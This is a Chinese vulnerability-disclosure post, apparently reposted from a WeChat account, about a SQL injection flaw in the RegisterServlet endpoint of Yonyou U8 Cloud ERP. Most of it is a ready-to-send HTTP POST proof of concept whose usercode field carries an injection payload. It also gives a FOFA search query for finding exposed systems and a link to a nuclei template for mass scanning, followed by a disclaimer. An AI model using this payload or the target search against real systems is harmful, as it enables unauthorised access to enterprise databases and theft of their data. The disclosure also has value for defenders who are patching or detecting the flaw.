一、漏洞描述
U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。
该系统RegisterServlet接口存在SQL注入漏洞,攻击者可通过此漏洞未经授权地访问数据库,存在企业数据泄露风险。
二、网络空间搜索引擎查询
fofa查询
app="用友-U8-Cloud"
三、漏洞复现
POC
POST /servlet/RegisterServlet HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
四、漏洞检测
nuclei批量检测
nuclei检测脚本已经放在了公开POC项目里面:
https://github.com/Vme18000yuan/FreePOC
希望大家下载时候顺便点个star 支持一下
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
原文始发于微信公众号(网络安全透视镜):【0 day】用友U8-cloud SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论